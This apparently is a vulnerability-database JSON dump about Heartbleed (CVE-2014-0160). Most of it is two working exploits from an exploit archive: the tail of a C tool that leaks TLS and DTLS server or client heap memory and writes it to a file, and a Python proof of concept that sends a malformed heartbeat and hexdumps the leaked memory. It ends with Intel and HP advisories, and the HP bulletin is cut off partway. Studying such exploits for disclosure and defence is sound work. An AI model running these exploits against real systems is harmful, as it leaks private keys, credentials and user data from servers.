apple;\r\n }\r\n }\r\n if (rr->length > SSL3_RT_MAX_PLAIN_LENGTH+extra) {\r\n al=SSL_AD_RECORD_OVERFLOW;\r\n SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_DATA_LENGTH_TOO_LONG);\r\n goto apple;\r\n }\r\n rr->off=0;\r\n s->packet_length=0;\r\n if(first==0){\r\n uint heartbleed_len = 0;\r\n char* fp = s->s3->rrec.data;\r\n (long)fp++;\r\n memcpy(&heartbleed_len,fp,2);\r\n heartbleed_len = (heartbleed_len & 0xff) << 8 | (heartbleed_len & 0xff00) >> 8;\r\n first = 2;\r\n leakbytes = heartbleed_len + 16;\r\n printf(\"[ heartbleed leaked length=%u\\n\",heartbleed_len);\r\n }\r\n if(verbose==1){\r\n { unsigned int z; for (z=0; z<rr->length; z++) printf(\"%02X%c\",rr->data[z],((z+1)%16)?' ':'\\n'); }\r\n printf(\"\\n\");\r\n }\r\n leakbytes-=rr->length;\r\n if(leakbytes > 0){\r\n repeat = 1;\r\n }\r\n else{\r\n repeat = 0;\r\n }\r\n printf(\"[ final record type=%d, length=%u\\n\", rr->type, rr->length);\r\n int output = s->s3->rrec.length-3;\r\n if(output > 0){\r\n int fd = open(filename,O_RDWR|O_CREAT|O_APPEND,0700);\r\n if(first==2){\r\n first--;\r\n write(fd,s->s3->rrec.data+3,s->s3->rrec.length);\r\n /* first three bytes are resp+len */\r\n printf(\"[ wrote %d bytes of heap to file '%s'\\n\",s->s3->rrec.length-3,filename);\r\n }\r\n else{\r\n /* heap data & 16 bytes padding */\r\n write(fd,s->s3->rrec.data+3,s->s3->rrec.length);\r\n printf(\"[ wrote %d bytes of heap to file '%s'\\n\",s->s3->rrec.length,filename);\r\n }\r\n close(fd);\r\n }\r\n else{\r\n printf(\"[ nothing from the heap to write\\n\");\r\n }\r\n return;\r\napple:\r\n printf(\"[ problem handling SSL record packet - wrong type?\\n\");\r\n badpackets++;\r\n if(badpackets > 3){\r\n printf(\"[ error: too many bad packets recieved\\n\");\r\n exit(0);\r\n }\r\n return;\r\n}\r\n \r\n \r\nvoid* dtlssneakyleaky(connection *c,char* filename, int verbose){\r\n char *p;\r\n int ssl_major,ssl_minor,al;\r\n int enc_err,n,i;\r\n SSL3_RECORD *rr;\r\n SSL_SESSION *sess;\r\n SSL* s;\r\n DTLS1_BITMAP *bitmap;\r\n unsigned int is_next_epoch;\r\n unsigned char md[EVP_MAX_MD_SIZE];\r\n short version;\r\n unsigned int mac_size, orig_len;\r\n \r\n rr= &(c->sslHandle->s3->rrec);\r\n sess=c->sslHandle->session;\r\n s = c->sslHandle;\r\n \r\nagain:\r\n if ((s->rstate != SSL_ST_READ_BODY) ||\r\n (s->packet_length < DTLS1_RT_HEADER_LENGTH)) {\r\n n=ssl3_read_n(s, DTLS1_RT_HEADER_LENGTH, s->s3->rbuf.len, 0);\r\n if (n <= 0)\r\n goto apple;\r\n \r\n s->rstate=SSL_ST_READ_BODY;\r\n p=s->packet;\r\n rr->type= *(p++);\r\n ssl_major= *(p++);\r\n ssl_minor= *(p++);\r\n version=(ssl_major<<8)|ssl_minor;\r\n n2s(p,rr->epoch);\r\n memcpy(&(s->s3->read_sequence[2]), p, 6);\r\n p+=6;\r\n n2s(p,rr->length);\r\n if(rr->type==24){\r\n printf(\"[ heartbeat returned type=%d length=%u\\n\",rr->type, rr->length);\r\n if(rr->length > 16834){\r\n printf(\"[ error: got a malformed TLS length.\\n\");\r\n exit(0);\r\n }\r\n }\r\n else{\r\n printf(\"[ incorrect record type=%d length=%u returned\\n\",rr->type,rr->length);\r\n s->packet_length=0;\r\n badpackets++;\r\n if(badpackets > 3){\r\n printf(\"[ error: too many bad packets recieved\\n\");\r\n exit(0);\r\n }\r\n goto apple;\r\n }\r\n }\r\n \r\n if (rr->length > s->packet_length-DTLS1_RT_HEADER_LENGTH){\r\n i=rr->length;\r\n n=ssl3_read_n(s,i,i,1);\r\n if (n <= 0) goto apple;\r\n }\r\n if ( n != i)\r\n {\r\n rr->length = 0;\r\n s->packet_length = 0;\r\n goto again;\r\n }\r\n printf(\"[ decrypting SSL packet\\n\");\r\n s->rstate=SSL_ST_READ_HEADER;\r\n \r\n bitmap = dtls1_get_bitmap(s, rr, &is_next_epoch);\r\n if ( bitmap == NULL)\r\n {\r\n rr->length = 0;\r\n s->packet_length = 0;\r\n goto again;\r\n }\r\n \r\n if (!(s->d1->listen && rr->type == SSL3_RT_HANDSHAKE &&\r\n *p == SSL3_MT_CLIENT_HELLO) &&\r\n !dtls1_record_replay_check(s, bitmap))\r\n {\r\n rr->length = 0;\r\n s->packet_length=0;\r\n goto again;\r\n }\r\n \r\n if (rr->length == 0) goto again;\r\nif (is_next_epoch)\r\n {\r\n if ((SSL_in_init(s) || s->in_handshake) && !s->d1->listen)\r\n {\r\n dtls1_buffer_record(s, &(s->d1->unprocessed_rcds), rr->seq_num);\r\n }\r\n rr->length = 0;\r\n s->packet_length = 0;\r\n goto again;\r\n }\r\n \r\n \r\n rr->input= &(s->packet[DTLS1_RT_HEADER_LENGTH]);\r\n rr->data=rr->input;\r\n orig_len=rr->length;\r\n \r\n dtls1_enc(s,0);\r\n \r\n if((sess != NULL) &&\r\n (s->enc_read_ctx != NULL) &&\r\n (EVP_MD_CTX_md(s->read_hash) != NULL))\r\n {\r\n unsigned char *mac = NULL;\r\n unsigned char mac_tmp[EVP_MAX_MD_SIZE];\r\n mac_size=EVP_MD_CTX_size(s->read_hash);\r\n OPENSSL_assert(mac_size <= EVP_MAX_MD_SIZE);\r\n orig_len = rr->length+((unsigned int)rr->type>>8);\r\n if(orig_len < mac_size ||\r\n (EVP_CIPHER_CTX_mode(s->enc_read_ctx) == EVP_CIPH_CBC_MODE &&\r\n orig_len < mac_size+1)){\r\n al=SSL_AD_DECODE_ERROR;\r\n SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_LENGTH_TOO_SHORT);\r\n }\r\n if (EVP_CIPHER_CTX_mode(s->enc_read_ctx) == EVP_CIPH_CBC_MODE){\r\n mac = mac_tmp;\r\n ssl3_cbc_copy_mac(mac_tmp, rr, mac_size, orig_len);\r\n rr->length -= mac_size;\r\n }\r\n else{\r\n rr->length -= mac_size;\r\n mac = &rr->data[rr->length];\r\n }\r\n i = tls1_mac(s,md,0);\r\n \r\n if (i < 0 || mac == NULL || CRYPTO_memcmp(md, mac, (size_t)mac_size) != 0)\r\n enc_err = -1;\r\n \r\n if (rr->length > SSL3_RT_MAX_COMPRESSED_LENGTH+mac_size)\r\n enc_err = -1;\r\n }\r\n if(enc_err < 0){\r\n al=SSL_AD_BAD_RECORD_MAC;\r\n SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_DECRYPTION_FAILED_OR_BAD_RECORD_MAC);\r\n goto apple;\r\n }\r\n if(s->expand != NULL){\r\n if (rr->length > SSL3_RT_MAX_COMPRESSED_LENGTH) {\r\n al=SSL_AD_RECORD_OVERFLOW;\r\n SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_COMPRESSED_LENGTH_TOO_LONG);\r\n goto apple;\r\n }\r\n if (!ssl3_do_uncompress(s)) {\r\n al=SSL_AD_DECOMPRESSION_FAILURE;\r\n SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_BAD_DECOMPRESSION);\r\n goto apple;\r\n }\r\n }\r\n \r\n if (rr->length > SSL3_RT_MAX_PLAIN_LENGTH) {\r\n al=SSL_AD_RECORD_OVERFLOW;\r\n SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_DATA_LENGTH_TOO_LONG);\r\n goto apple;\r\n }\r\n rr->off=0;\r\n s->packet_length=0;\r\n dtls1_record_bitmap_update(s, &(s->d1->bitmap));\r\n if(first==0){\r\n uint heartbleed_len = 0;\r\n char* fp = s->s3->rrec.data;\r\n (long)fp++;\r\n memcpy(&heartbleed_len,fp,2);\r\n heartbleed_len = (heartbleed_len & 0xff) << 8 | (heartbleed_len & 0xff00) >> 8;\r\n first = 2;\r\n leakbytes = heartbleed_len + 16;\r\n printf(\"[ heartbleed leaked length=%u\\n\",heartbleed_len);\r\n }\r\n if(verbose==1){\r\n { unsigned int z; for (z=0; z<rr->length; z++) printf(\"%02X%c\",rr->data[z],((z+1)%16)?' ':'\\n'); }\r\n printf(\"\\n\");\r\n }\r\n leakbytes-=rr->length;\r\n if(leakbytes > 0){\r\n repeat = 1;\r\n }\r\n else{\r\n repeat = 0;\r\n }\r\n printf(\"[ final record type=%d, length=%u\\n\", rr->type, rr->length);\r\n int output = s->s3->rrec.length-3;\r\n if(output > 0){\r\n int fd = open(filename,O_RDWR|O_CREAT|O_APPEND,0700);\r\n if(first==2){\r\n first--;\r\n write(fd,s->s3->rrec.data+3,s->s3->rrec.length);\r\n /* first three bytes are resp+len */\r\n printf(\"[ wrote %d bytes of heap to file '%s'\\n\",s->s3->rrec.length-3,filename);\r\n }\r\n else{\r\n /* heap data & 16 bytes padding */\r\n write(fd,s->s3->rrec.data+3,s->s3->rrec.length);\r\n printf(\"[ wrote %d bytes of heap to file '%s'\\n\",s->s3->rrec.length,filename);\r\n }\r\n close(fd);\r\n }\r\n else{\r\n printf(\"[ nothing from the heap to write\\n\");\r\n }\r\n \r\n dtls1_stop_timer(c->sslHandle);\r\n c->sslHandle->tlsext_hb_seq++;\r\n c->sslHandle->tlsext_hb_pending = 0;\r\n \r\n return;\r\napple:\r\n printf(\"[ problem handling SSL record packet - wrong type?\\n\");\r\n badpackets++;\r\n if(badpackets > 3){\r\n printf(\"[ error: too many bad packets recieved\\n\");\r\n exit(0);\r\n }\r\n return;\r\n}\r\n \r\nstatic DTLS1_BITMAP *\r\ndtls1_get_bitmap(SSL *s, SSL3_RECORD *rr, unsigned int *is_next_epoch)\r\n {\r\n \r\n *is_next_epoch = 0;\r\n \r\n if (rr->epoch == s->d1->r_epoch)\r\n return &s->d1->bitmap;\r\n \r\n else if (rr->epoch == (unsigned long)(s->d1->r_epoch + 1) &&\r\n (rr->type == SSL3_RT_HANDSHAKE ||\r\n rr->type == SSL3_RT_ALERT))\r\n {\r\n *is_next_epoch = 1;\r\n return &s->d1->next_bitmap;\r\n }\r\n \r\n return NULL;\r\n }\r\n \r\nstatic int dtls1_record_replay_check(SSL *s, DTLS1_BITMAP *bitmap)\r\n {\r\n int cmp;\r\n unsigned int shift;\r\n const unsigned char *seq = s->s3->read_sequence;\r\n \r\n cmp = satsub64be(seq,bitmap->max_seq_num);\r\n if (cmp > 0)\r\n {\r\n memcpy (s->s3->rrec.seq_num,seq,8);\r\n return 1;\r\n }\r\n shift = -cmp;\r\n if (shift >= sizeof(bitmap->map)*8)\r\n return 0;\r\n else if (bitmap->map & (1UL<<shift))\r\n return 0;\r\n \r\n memcpy (s->s3->rrec.seq_num,seq,8);\r\n return 1;\r\n }\r\n \r\nint satsub64be(const unsigned char *v1,const unsigned char *v2)\r\n{ int ret,sat,brw,i;\r\n \r\n if (sizeof(long) == 8) do\r\n { const union { long one; char little; } is_endian = {1};\r\n long l;\r\n \r\n if (is_endian.little) break;\r\n \r\n if (((size_t)v1|(size_t)v2)&0x7) break;\r\n \r\n l = *((long *)v1);\r\n l -= *((long *)v2);\r\n if (l>128) return 128;\r\n else if (l<-128) return -128;\r\n else return (int)l;\r\n } while (0);\r\n \r\n ret = (int)v1[7]-(int)v2[7];\r\n sat = 0;\r\n brw = ret>>8;\r\n if (ret & 0x80)\r\n { for (i=6;i>=0;i--)\r\n { brw += (int)v1[i]-(int)v2[i];\r\n sat |= ~brw;\r\n brw >>= 8;\r\n }\r\n }\r\n else\r\n { for (i=6;i>=0;i--)\r\n { brw += (int)v1[i]-(int)v2[i];\r\n sat |= brw;\r\n brw >>= 8;\r\n }\r\n }\r\n brw <<= 8;\r\n \r\n if (sat&0xff) return brw | 0x80;\r\n else return brw + (ret&0xFF);\r\n}\r\n \r\nstatic int\r\ndtls1_buffer_record(SSL *s, record_pqueue *queue, unsigned char *priority)\r\n {\r\n DTLS1_RECORD_DATA *rdata;\r\n pitem *item;\r\n \r\n if (pqueue_size(queue->q) >= 100)\r\n return 0;\r\n \r\n rdata = OPENSSL_malloc(sizeof(DTLS1_RECORD_DATA));\r\n item = pitem_new(priority, rdata);\r\n if (rdata == NULL || item == NULL)\r\n {\r\n if (rdata != NULL) OPENSSL_free(rdata);\r\n if (item != NULL) pitem_free(item);\r\n \r\n SSLerr(SSL_F_DTLS1_BUFFER_RECORD, ERR_R_INTERNAL_ERROR);\r\n return(0);\r\n }\r\n \r\n rdata->packet = s->packet;\r\n rdata->packet_length = s->packet_length;\r\n memcpy(&(rdata->rbuf), &(s->s3->rbuf), sizeof(SSL3_BUFFER));\r\n memcpy(&(rdata->rrec), &(s->s3->rrec), sizeof(SSL3_RECORD));\r\n \r\n item->data = rdata;\r\n \r\n#ifndef OPENSSL_NO_SCTP\r\n if (BIO_dgram_is_sctp(SSL_get_rbio(s)) &&\r\n (s->state == SSL3_ST_SR_FINISHED_A || s->state == SSL3_ST_CR_FINISHED_A)) {\r\n BIO_ctrl(SSL_get_rbio(s), BIO_CTRL_DGRAM_SCTP_GET_RCVINFO, sizeof(rdata->recordinfo), &rdata->recordinfo);\r\n }\r\n#endif\r\n \r\n if (pqueue_insert(queue->q, item) == NULL)\r\n {\r\n OPENSSL_free(rdata);\r\n pitem_free(item);\r\n return(0);\r\n }\r\n \r\n s->packet = NULL;\r\n s->packet_length = 0;\r\n memset(&(s->s3->rbuf), 0, sizeof(SSL3_BUFFER));\r\n memset(&(s->s3->rrec), 0, sizeof(SSL3_RECORD));\r\n \r\n if (!ssl3_setup_buffers(s))\r\n {\r\n SSLerr(SSL_F_DTLS1_BUFFER_RECORD, ERR_R_INTERNAL_ERROR);\r\n OPENSSL_free(rdata);\r\n pitem_free(item);\r\n return(0);\r\n }\r\n \r\n return(1);\r\n }\r\n \r\n \r\nstatic void dtls1_record_bitmap_update(SSL *s, DTLS1_BITMAP *bitmap)\r\n {\r\n int cmp;\r\n unsigned int shift;\r\n const unsigned char *seq = s->s3->read_sequence;\r\n \r\n cmp = satsub64be(seq,bitmap->max_seq_num);\r\n if (cmp > 0)\r\n {\r\n shift = cmp;\r\n if (shift < sizeof(bitmap->map)*8)\r\n bitmap->map <<= shift, bitmap->map |= 1UL;\r\n else\r\n bitmap->map = 1UL;\r\n memcpy(bitmap->max_seq_num,seq,8);\r\n }\r\n else {\r\n shift = -cmp;\r\n if (shift < sizeof(bitmap->map)*8)\r\n bitmap->map |= 1UL<<shift;\r\n }\r\n }\r\n \r\n \r\nvoid usage(){\r\n printf(\"[\\n\");\r\n printf(\"[ --server|-s <ip/dns> - the server to target\\n\");\r\n printf(\"[ --port|-p <port> - the port to target\\n\");\r\n printf(\"[ --file|-f <filename> - file to write data to\\n\");\r\n printf(\"[ --bind|-b <ip> - bind to ip for exploiting clients\\n\");\r\n printf(\"[ --precmd|-c <n> - send precmd buffer (STARTTLS)\\n\");\r\n printf(\"[ 0 = SMTP\\n\");\r\n printf(\"[ 1 = POP3\\n\");\r\n printf(\"[ 2 = IMAP\\n\");\r\n printf(\"[ --loop|-l - loop the exploit attempts\\n\");\r\n printf(\"[ --type|-t <n> - select exploit to try\\n\");\r\n printf(\"[ 0 = null length\\n\");\r\n printf(\"[ 1 = max leak\\n\");\r\n printf(\"[ n = heartbeat payload_length\\n\");\r\n printf(\"[ --udp|-u - use dtls/udp\\n\");\r\n printf(\"[\\n\");\r\n printf(\"[ --verbose|-v - output leak to screen\\n\");\r\n printf(\"[ --help|-h - this output\\n\");\r\n printf(\"[\\n\");\r\n exit(0);\r\n}\r\n \r\nint main(int argc, char* argv[]){\r\n int ret, port, userc, index;\r\n int type = 1, udp = 0, verbose = 0, bind = 0, precmd = 9;\r\n int loop = 0;\r\n struct hostent *h;\r\n connection* c;\r\n char *host, *file;\r\n int ihost = 0, iport = 0, ifile = 0, itype = 0, iprecmd = 0;\r\n printf(\"[ heartbleed - CVE-2014-0160 - OpenSSL information leak exploit\\n\");\r\n printf(\"[ =============================================================\\n\");\r\n static struct option options[] = {\r\n {\"server\", 1, 0, 's'},\r\n {\"port\", 1, 0, 'p'},\r\n {\"file\", 1, 0, 'f'},\r\n {\"type\", 1, 0, 't'},\r\n {\"bind\", 1, 0, 'b'},\r\n {\"verbose\", 0, 0, 'v'},\r\n {\"precmd\", 1, 0, 'c'},\r\n {\"loop\", 0, 0, 'l'},\r\n {\"help\", 0, 0,'h'},\r\n {\"udp\", 0, 0, 'u'}\r\n };\r\n while(userc != -1) {\r\n userc = getopt_long(argc,argv,\"s:p:f:t:b:c:lvhu\",options,&index); \r\n switch(userc) {\r\n case -1:\r\n break;\r\n case 's':\r\n if(ihost==0){\r\n ihost = 1;\r\n h = gethostbyname(optarg); \r\n if(h==NULL){\r\n printf(\"[!] FATAL: unknown host '%s'\\n\",optarg);\r\n exit(1);\r\n }\r\n host = malloc(strlen(optarg) + 1);\r\n if(host==NULL){\r\n printf(\"[ error in malloc()\\n\");\r\n exit(0);\r\n }\r\n sprintf(host,\"%s\",optarg);\r\n }\r\n break;\r\n case 'p':\r\n if(iport==0){\r\n port = atoi(optarg);\r\n iport = 1;\r\n }\r\n break;\r\n case 'f':\r\n if(ifile==0){\r\n file = malloc(strlen(optarg) + 1);\r\n if(file==NULL){\r\n printf(\"[ error in malloc()\\n\");\r\n exit(0);\r\n }\r\n sprintf(file,\"%s\",optarg);\r\n ifile = 1;\r\n }\r\n break;\r\n case 't':\r\n if(itype==0){\r\n type = atoi(optarg);\r\n itype = 1;\r\n }\r\n break;\r\n case 'h':\r\n usage();\r\n break;\r\n case 'b':\r\n if(ihost==0){\r\n ihost = 1;\r\n host = malloc(strlen(optarg)+1);\r\n if(host==NULL){\r\n printf(\"[ error in malloc()\\n\");\r\n exit(0);\r\n }\r\n sprintf(host,\"%s\",optarg);\r\n bind = 1;\r\n }\r\n break;\r\n case 'c':\r\n if(iprecmd == 0){\r\n iprecmd = 1;\r\n precmd = atoi(optarg);\r\n }\r\n break;\r\n case 'v':\r\n verbose = 1;\r\n break;\r\n case 'l':\r\n loop = 1;\r\n break;\r\n case 'u':\r\n udp = 1;\r\n break;\r\n \r\n default:\r\n break;\r\n }\r\n }\r\n if(ihost==0||iport==0||ifile==0||itype==0){\r\n printf(\"[ try --help\\n\");\r\n exit(0);\r\n }\r\n ssl_init();\r\n if(bind==0){\r\n if (udp){\r\n c = dtls_client(ret, host, port);\r\n dtlsheartbleed(c, type);\r\n dtlssneakyleaky(c,file,verbose);\r\n while(repeat==1){\r\n dtlssneakyleaky(c,file,verbose);\r\n }\r\n while(loop==1){\r\n printf(\"[ entered heartbleed loop\\n\");\r\n first=0;\r\n repeat=1;\r\n dtlsheartbleed(c,type);\r\n while(repeat==1){\r\n dtlssneakyleaky(c,file,verbose);\r\n }\r\n }\r\n }\r\n else {\r\n ret = tcp_connect(host, port);\r\n pre_cmd(ret, precmd, verbose);\r\n c = tls_connect(ret);\r\n heartbleed(c,type);\r\n while(repeat==1){\r\n sneakyleaky(c,file,verbose);\r\n }\r\n while(loop==1){\r\n printf(\"[ entered heartbleed loop\\n\");\r\n first=0;\r\n repeat=1;\r\n heartbleed(c,type);\r\n while(repeat==1){\r\n sneakyleaky(c,file,verbose);\r\n }\r\n }\r\n }\r\n \r\n SSL_shutdown(c->sslHandle);\r\n close (ret);\r\n SSL_free(c->sslHandle);\r\n }\r\n else{\r\n int sd, pid, i;\r\n if (udp) {\r\n c = dtls_server(sd, host, port);\r\n while (1) {\r\n char * bytes = malloc(1024);\r\n struct sockaddr_in peer;\r\n socklen_t len = sizeof(peer);\r\n if (recvfrom(c->socket,bytes,1023,0,(struct sockaddr *)&peer,&len) > 0) {\r\n dtlsheartbleed(c,type);\r\n dtlssneakyleaky(c,file,verbose);\r\n while(loop==1){\r\n printf(\"[ entered heartbleed loop\\n\");\r\n first=0;\r\n repeat=0;\r\n dtlsheartbleed(c,type);\r\n while(repeat==1){\r\n dtlssneakyleaky(c,file,verbose);\r\n }\r\n }\r\n }\r\n }\r\n }\r\n else {\r\n ret = tcp_bind(host, port);\r\n while(1){\r\n sd=accept(ret,0,0);\r\n if(sd==-1){\r\n printf(\"[!] FATAL: problem with accept()\\n\");\r\n exit(0);\r\n }\r\n if(pid=fork()){\r\n close(sd);\r\n }\r\n else{\r\n c = tls_bind(sd);\r\n pre_cmd(ret, precmd, verbose);\r\n heartbleed(c,type);\r\n while(repeat==1){\r\n sneakyleaky(c,file,verbose);\r\n }\r\n while(loop==1){\r\n printf(\"[ entered heartbleed loop\\n\");\r\n first=0;\r\n repeat=0;\r\n heartbleed(c,type);\r\n while(repeat==1){\r\n sneakyleaky(c,file,verbose);\r\n }\r\n }\r\n printf(\"[ done.\\n\");\r\n exit(0);\r\n }\r\n }\r\n }\r\n }\r\n}\n\n# 0day.today [2018-04-13] #", "sourceHref": "https://0day.today/exploit/22172", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-03-19T11:11:23", "description": "This memory disclosure exploit is a quick and dirty demonstration of the TLS heartbeat extension vulnerability.", "cvss3": {}, "published": "2014-04-08T00:00:00", "type": "zdt", "title": "OpenSSL TLS Heartbeat Extension - Memory Disclosure", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-0160"], "modified": "2014-04-08T00:00:00", "id": "1337DAY-ID-22114", "href": "https://0day.today/exploit/description/22114", "sourceData": "#!/usr/bin/python\r\n \r\n# Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford ([email\u00a0protected])\r\n# The author disclaims copyright to this source code.\r\n \r\nimport sys\r\nimport struct\r\nimport socket\r\nimport time\r\nimport select\r\nimport re\r\nfrom optparse import OptionParser\r\n \r\noptions = OptionParser(usage='%prog server [options]', description='Test for SSL heartbeat vulnerability (CVE-2014-0160)')\r\noptions.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)')\r\n \r\ndef h2bin(x):\r\n return x.replace(' ', '').replace('\\n', '').decode('hex')\r\n \r\nhello = h2bin('''\r\n16 03 02 00 dc 01 00 00 d8 03 02 53\r\n43 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cf\r\nbd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de 00\r\n00 66 c0 14 c0 0a c0 22 c0 21 00 39 00 38 00 88\r\n00 87 c0 0f c0 05 00 35 00 84 c0 12 c0 08 c0 1c\r\nc0 1b 00 16 00 13 c0 0d c0 03 00 0a c0 13 c0 09\r\nc0 1f c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44\r\nc0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07 c0 0c\r\nc0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 11\r\n00 08 00 06 00 03 00 ff 01 00 00 49 00 0b 00 04\r\n03 00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 19\r\n00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08\r\n00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13\r\n00 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00\r\n00 0f 00 01 01 \r\n''')\r\n \r\nhb = h2bin('''\r\n18 03 02 00 03\r\n01 40 00\r\n''')\r\n \r\ndef hexdump(s):\r\n for b in xrange(0, len(s), 16):\r\n lin = [c for c in s[b : b + 16]]\r\n hxdat = ' '.join('%02X' % ord(c) for c in lin)\r\n pdat = ''.join((c if 32 <= ord(c) <= 126 else '.' )for c in lin)\r\n print ' %04x: %-48s %s' % (b, hxdat, pdat)\r\n print\r\n \r\ndef recvall(s, length, timeout=5):\r\n endtime = time.time() + timeout\r\n rdata = ''\r\n remain = length\r\n while remain > 0:\r\n rtime = endtime - time.time()\r\n if rtime < 0:\r\n return None\r\n r, w, e = select.select([s], [], [], 5)\r\n if s in r:\r\n data = s.recv(remain)\r\n # EOF?\r\n if not data:\r\n return None\r\n rdata += data\r\n remain -= len(data)\r\n return rdata\r\n \r\n \r\ndef recvmsg(s):\r\n hdr = recvall(s, 5)\r\n if hdr is None:\r\n print 'Unexpected EOF receiving record header - server closed connection'\r\n return None, None, None\r\n typ, ver, ln = struct.unpack('>BHH', hdr)\r\n pay = recvall(s, ln, 10)\r\n if pay is None:\r\n print 'Unexpected EOF receiving record payload - server closed connection'\r\n return None, None, None\r\n print ' ... received message: type = %d, ver = %04x, length = %d' % (typ, ver, len(pay))\r\n return typ, ver, pay\r\n \r\ndef hit_hb(s):\r\n s.send(hb)\r\n while True:\r\n typ, ver, pay = recvmsg(s)\r\n if typ is None:\r\n print 'No heartbeat response received, server likely not vulnerable'\r\n return False\r\n \r\n if typ == 24:\r\n print 'Received heartbeat response:'\r\n hexdump(pay)\r\n if len(pay) > 3:\r\n print 'WARNING: server returned more data than it should - server is vulnerable!'\r\n else:\r\n print 'Server processed malformed heartbeat, but did not return any extra data.'\r\n return True\r\n \r\n if typ == 21:\r\n print 'Received alert:'\r\n hexdump(pay)\r\n print 'Server returned error, likely not vulnerable'\r\n return False\r\n \r\ndef main():\r\n opts, args = options.parse_args()\r\n if len(args) < 1:\r\n options.print_help()\r\n return\r\n \r\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n print 'Connecting...'\r\n sys.stdout.flush()\r\n s.connect((args[0], opts.port))\r\n print 'Sending Client Hello...'\r\n sys.stdout.flush()\r\n s.send(hello)\r\n print 'Waiting for Server Hello...'\r\n sys.stdout.flush()\r\n while True:\r\n typ, ver, pay = recvmsg(s)\r\n if typ == None:\r\n print 'Server closed connection without sending Server Hello.'\r\n return\r\n # Look for server hello done message.\r\n if typ == 22 and ord(pay[0]) == 0x0E:\r\n break\r\n \r\n print 'Sending heartbeat request...'\r\n sys.stdout.flush()\r\n s.send(hb)\r\n hit_hb(s)\r\n \r\nif __name__ == '__main__':\r\n main()\n\n# 0day.today [2018-03-19] #", "sourceHref": "https://0day.today/exploit/22114", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "intel": [{"lastseen": "2022-05-09T11:49:12", "description": "**Summary: **\n\nOn April 7th 2014, OpenSSL.org published a Security Advisory concerning a missing bounds check bug in the implementation of the TLS heartbeat extension (CVE-2014-0160). Intel PSIRT will continue to update this advisory as additional information becomes available.\n\n**Description: **\n\nOn April 7th 2014, OpenSSL.org published a Security Advisory concerning a missing bounds check bug in the implementation of the TLS heartbeat extension (CVE-2014-0160). Intel is publishing an advisory concerning impacted Product and Services that have been updated due to CVE-2014-0160.\n", "cvss3": {}, "published": "2014-04-30T00:00:00", "type": "intel", "title": "Multiple Intel Software Products and API Services impacted by CVE-2014-0160", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2014-0160"], "modified": "2014-04-15T00:00:00", "id": "INTEL:INTEL-SA-00037", "href": "https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00037.html", "cvss": {"score": 0.0, "vector": "NONE"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:51", "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nNote: the current version of the following document is available here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/\r\ndocDisplay?docId=emr_na-c04236062\r\n\r\nSUPPORT COMMUNICATION - SECURITY BULLETIN\r\n\r\nDocument ID: c04236062\r\nVersion: 2\r\n\r\nHPSBMU02994 rev.2 - HP BladeSystem c-Class Onboard Administrator (OA) running\r\nOpenSSL, Remote Disclosure of Information\r\n\r\nNOTICE: The information in this Security Bulletin should be acted upon as\r\nsoon as possible.\r\n\r\nRelease Date: 2014-04-13\r\nLast Updated: 2014-04-18\r\n\r\nPotential Security Impact: Remote disclosure of information\r\n\r\nSource: Hewlett-Packard Company, HP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY\r\nA potential security vulnerability has been identified in HP BladeSystem\r\nc-Class Onboard Administrator (OA) running OpenSSL. This is the OpenSSL\r\nvulnerability known as "Heartbleed" which could be exploited remotely\r\nresulting in disclosure of information.\r\n\r\nReferences: CVE-2014-0160, SSRT101500\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\nHP BladeSystem c-Class Onboard Administrator (OA) v4.11 and 4.20\r\n\r\nBACKGROUND\r\n\r\nCVSS 2.0 Base Metrics\r\n===========================================================\r\n Reference Base Vector Base Score\r\nCVE-2014-0160 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0\r\n===========================================================\r\n Information on CVSS is documented\r\n in HP Customer Notice: HPSN-2008-002\r\n\r\nRESOLUTION\r\n\r\nHP is actively working to address this vulnerability for v4.20 of HP Onboard\r\nAdministrator (OA). This bulletin will be revised when an update for v4.20\r\nsoftware is released.\r\n\r\nHP has made Onboard Administrator (OA) v4.12 available to resolve the\r\nvulnerability here:\r\n\r\n 1) Go to: http://www.hp.com/go/oa\r\n 2) Click "Onboard Administrator Firmware"\r\n 3) Select "HP BLc3000 Onboard Administrator Option" or "HP BLc7000 Onboard\r\nAdministrator Option"\r\n 4) Select an appropriate operating system from the list of choices\r\n 5) On the page, find Firmware 4.12 for download\r\n\r\nNotes\r\n\r\nCustomers running OA v4.20 also have the option to downgrade OA firmware to\r\nOA v4.12 if that meets the requisite Hardware/feature support for the\r\nenclosure configuration.\r\nNo action is required unless the OA is running the firmware versions\r\nexplicitly listed as vulnerable.\r\n\r\nHISTORY\r\nVersion:1 (rev.1) - 13 April 2014 Initial release\r\nVersion:2 (rev.2) - 18 April 2014 Added software update information for v4.12\r\n\r\nThird Party Security Patches: Third party security patches that are to be\r\ninstalled on systems running HP software products should be applied 